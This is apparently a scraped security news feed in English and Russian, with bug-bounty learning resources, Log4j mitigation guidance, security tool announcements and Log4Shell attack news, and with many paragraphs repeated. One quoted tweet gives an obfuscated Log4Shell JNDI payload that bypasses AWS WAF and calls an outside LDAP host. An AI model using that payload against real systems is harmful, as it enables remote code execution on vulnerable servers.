https://xvnpw.github.io/
xvnpw personal blog with posts about hacking, bug bounty, appsec
xvnpw personal blog with posts about hacking, bug bounty, appsec
Message from one of discord chat:
How to get started with hacking and bug bounties?
We've gathered some useful resources to get your started on your bug bounty journey!
- Guide to learn hacking https://www.youtube.com/watch?v=2TofunAI6fU
- Finding your first bug: bounty hunting tips from the Burp Suite community https://portswigger.net/blog/finding-your-first-bug-bounty-hunting-tips-from-the-burp-suite-community
- Port Swigger Web Security Academy https://portswigger.net/web-security/learning-path
- Nahamsec's Twitch https://www.twitch.tv/nahamsec
- Nahamsec interviews with top bug bounty hunters https://www.youtube.com/c/Nahamsec
- Nahamsec's beginner repo https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
- Stök https://www.youtube.com/c/STOKfredrik
- InsiderPhD https://www.youtube.com/c/InsiderPhD
- Series for new bug hunters https://www.youtube.com/playlist?list=PLbyncTkpno5FAC0DJYuJrEqHSMdudEffw
- Jhaddix https://www.youtube.com/c/jhaddix
- Posts from Hacker101 members on how to get started hacking
- zonduu https://medium.com/@zonduu/bug-bounty-beginners-guide-683e9d567b9f
- p4nda https://enfinlay.github.io/bugbounty/2020/08/15/so-you-wanna-hack.html
- also a blog on subdomain takeovers https://enfinlay.github.io/sto/ip/domain/bugbounty/2020/09/12/ip-server-domain.html
- clos2100 on getting started without a technical background https://twitter.com/pirateducky/status/1300566000665014275
- dee-see's resources for Android Hacking https://blog.deesee.xyz/android/security/2020/01/13/android-application-hacking-resources.html
- hacker101 videos https://www.hacker101.com/videos
How to get started with hacking and bug bounties?
We've gathered some useful resources to get your started on your bug bounty journey!
- Guide to learn hacking https://www.youtube.com/watch?v=2TofunAI6fU
- Finding your first bug: bounty hunting tips from the Burp Suite community https://portswigger.net/blog/finding-your-first-bug-bounty-hunting-tips-from-the-burp-suite-community
- Port Swigger Web Security Academy https://portswigger.net/web-security/learning-path
- Nahamsec's Twitch https://www.twitch.tv/nahamsec
- Nahamsec interviews with top bug bounty hunters https://www.youtube.com/c/Nahamsec
- Nahamsec's beginner repo https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
- Stök https://www.youtube.com/c/STOKfredrik
- InsiderPhD https://www.youtube.com/c/InsiderPhD
- Series for new bug hunters https://www.youtube.com/playlist?list=PLbyncTkpno5FAC0DJYuJrEqHSMdudEffw
- Jhaddix https://www.youtube.com/c/jhaddix
- Posts from Hacker101 members on how to get started hacking
- zonduu https://medium.com/@zonduu/bug-bounty-beginners-guide-683e9d567b9f
- p4nda https://enfinlay.github.io/bugbounty/2020/08/15/so-you-wanna-hack.html
- also a blog on subdomain takeovers https://enfinlay.github.io/sto/ip/domain/bugbounty/2020/09/12/ip-server-domain.html
- clos2100 on getting started without a technical background https://twitter.com/pirateducky/status/1300566000665014275
- dee-see's resources for Android Hacking https://blog.deesee.xyz/android/security/2020/01/13/android-application-hacking-resources.html
- hacker101 videos https://www.hacker101.com/videos
YouTube
The Secret step-by-step Guide to learn Hacking
totally clickbait. but also not clickbait. I don't know where to start hacking, there is no guide to learn this stuff. But I hope you still have a plan now!
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
Get the LiveOverflow Font: https://shop.liveoverflow.com (advertisement)
Checkout: https://live…
Forwarded from Security Wine (бывший - DevSecOps Wine) (Denis Yakimov)
Log4j - impacted products
Самое время посмотреть на те продукты, которые попали под impact от log4j:
https://github.com/NCSC-NL/log4shell/tree/main/software
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
Фиксить придется много
#dev #ops #attack
Самое время посмотреть на те продукты, которые попали под impact от log4j:
https://github.com/NCSC-NL/log4shell/tree/main/software
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
Фиксить придется много
#dev #ops #attack
https://youtu.be/voTHFdL9S2k
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
YouTube
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages!
We propose a new exploit technique that brings a whole-new attack surface to bypass SSRF (Server Side Request Forgery) protections. This is a very general attack approach, in which we used in combination with our own fuzzing tool to discover many 0days in…
https://logging.apache.org/log4j/2.x/security.html
Mitigation
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0.
- Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
Mitigation
Log4j 1.x mitigation: Log4j 1.x does not have Lookups so the risk is lower. Applications using Log4j 1.x are only vulnerable to this attack when they use JNDI in their configuration. A separate CVE (CVE-2021-4104) has been filed for this vulnerability. To mitigate: audit your logging configuration to ensure it has no JMSAppender configured. Log4j 1.x configurations without JMSAppender are not impacted by this vulnerability.
Log4j 2.x mitigation: Implement one of the mitigation techniques below.
- Java 8 (or later) users should upgrade to release 2.16.0.
- Users requiring Java 7 should upgrade to release 2.12.2 when it becomes available (work in progress, expected to be available soon).
- Otherwise, remove the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
Note that only the log4j-core JAR file is impacted by this vulnerability. Applications using only the log4j-api JAR file without the log4j-core JAR file are not impacted by this vulnerability.
Forwarded from Pentesting News
STEWS.pdf
723.6 KB
Realtime Problems: #Exposing #WebSocket Servers Hidden in Plain Sight
A Security Tool
https://github.com/PalindromeLabs/STEWS
A Security Tool
https://github.com/PalindromeLabs/STEWS
Forwarded from HackGit
Aparoid - Static and dynamic #Android application #security analysis.
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida noscripts for the bypass of root detection, SSL pinning, and debugger detection (custom noscripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
Aparoid is a #framework designed for Android application analysis. It offers an automated set of tools to discover vulnerabilities and other risks in mobile applications. It is built using the Flask framework and offers a web GUI to upload APK files and explore the contents/results.
The current version offers the following features:
1. APK decompilation using jadx
2. Vulnerability detection system (rules configurable using the dashboard)
3. Binary file risk analysis
4. Custom features for frameworks like React Native, Flutter and Xamarin
5. Android Manifest security checks
6. Dynamic analysis on all (rooted) Android devices (physical, emulated, and cloud-based)
7. Frida noscripts for the bypass of root detection, SSL pinning, and debugger detection (custom noscripts are also supported)
8. Automatic installation of a root CA certificate (also supports Burp Suite)
9. HTTP(S) interception proxy and real-time traffic viewer using Kafka
10. Real-time application stored data browser
https://github.com/stefan2200/aparoid
GitHub
GitHub - stefan2200/aparoid: Static and dynamic Android application security analysis
Static and dynamic Android application security analysis - stefan2200/aparoid
Forwarded from LeakInfo
Некоторые злоумышленники, использующие уязвимость Apache #Log4j, переключились с URL-адресов обратного вызова LDAP на RMI или даже использовали их одновременно.
На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным.
Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
На данный момент эта тенденция наблюдалась у преступников, стремящихся захватить ресурсы для майнинга Monero.
Большинство атак, нацеленных на уязвимость Log4j, осуществлялись через службу LDAP (облегченный протокол доступа к каталогам). Переход на RMI (Remote Method Invocation) API сначала кажется нелогичным.
Однако некоторые версии JVM (виртуальная машина Java) не содержат строгих политик, и поэтому RMI может быть более простым каналом для достижения RCE (удаленное выполнение кода), чем LDAP.
Juniper Networks
Log4j Vulnerability: Attackers Shift Focus From LDAP to RMI
Juniper Threat Labs has observed variants of the ongoing Log4j CVE-2021-44228 attacks that use an RMI service instead of LDAP.
https://twitter.com/11xuxx/status/1471826191724257285?t=uud1PH6uYJEnH7H4CQILNg&s=19Вот кстати пример, как обходят AWS WAF, поэтому и нужны фиксы на всех точках возможных атак
Twitter
xxux11 ᯲ ̸
Previous AWS WAF bypass is patched.. here is another: ${jnd${123%25ff:-${123%25ff:-i:}}ldap://mydogsbutt.com:1389/o} #bugbountytips #LOG4JDONTRELYONWAF
очередная уязвимость и выпуск 2.17 версии, чтоб защититься от DoS атаки через log4j
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
https://www.bleepingcomputer.com/news/security/upgraded-to-log4j-216-surprise-theres-a-217-fixing-dos/
BleepingComputer
Upgraded to log4j 2.16? Surprise, there's a 2.17 fixing DoS
Yesterday, BleepingComputer summed up all the log4j and logback CVEs known thus far. Ever since the critical log4j zero-day saga began last week, security experts have time and time again recommended version 2.16 as the safest release to be on. That changes…